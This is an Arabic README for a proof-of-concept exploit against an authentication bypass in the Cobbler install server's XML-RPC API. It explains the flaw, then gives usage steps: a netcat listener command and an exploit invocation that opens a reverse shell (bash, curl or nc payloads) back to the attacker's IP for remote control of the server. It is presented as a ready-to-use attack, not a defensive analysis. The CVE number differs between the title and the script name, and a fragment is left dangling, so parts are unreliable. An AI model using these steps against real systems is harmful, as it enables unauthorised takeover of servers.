
PoC لثغرة CVE-2025-47533 في Clobber RCE
Cobbler، وهو خادم تثبيت لأنظمة لينكس يتيح الإعداد السريع لبيئات التثبيت الشبكية، يحتوي على ثغرة مصادقة في الإصدارات من 3.0.0 حتى (وليس بما في ذلك) 3.2.3 و3.3.7. الدالة utils.get_shared_secret() تُرجع دائمًا -1، مما يسمح لأي شخص بالاتصال بواجهة Cobbler XML-RPC مع اسم مستخدم فارغ ('') وكلمة مرور -1. يتيح هذا لمهاجم لديه وصول إلى الشبكة السيطرة الكاملة على خادم Cobbler. تم إصلاح الثغرة في الإصدارين 3.2.3 و3.3.7.
تنجم الثغرة عن معالجة غير صحيحة للسر المشترك في الدالة utils.get_shared_secret()، والتي تُرجع دائمًا -1، مما يؤدي فعليًا إلى تجاوز المصادقة. يتيح ذلك لأي مستخدم على الشبكة الاتصال بواجهة XMLRPC الخاصة بـ Cobbler ببيانات اعتماد فارغة وتنفيذ أوامر عشوائية.
http://<target>:25151/ — نقطة نهاية API الخاصة بـ XMLRPC لـ Cobbler
يدعم سكربت الاستغلال عدة حمولات للصدفة العكسية، بما في ذلك:
nc)ابدأ مستمع Netcat على جهازك:
nc -lvnp 4444
شغّل سكربت الاستغلال CVE-2024-47533.py.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : الهدف (مثال: -t http://1<IP_SERVICE>:<PORT>)
-l: عنوان IP المحلي (مثال: -l 10.10.11.80)
-p : المنفذ <LOCAL_PORT> (مثال: -p 4444)
--payload: الحمولة (bash, curl, nc) (مثال: --payload bash)
عند التنفيذ الناجح، ستتصل الصدفة العكسية بالمستمع مجددًا، مما يمنح المهاجم وصولًا عن بُعد إلى الخادم.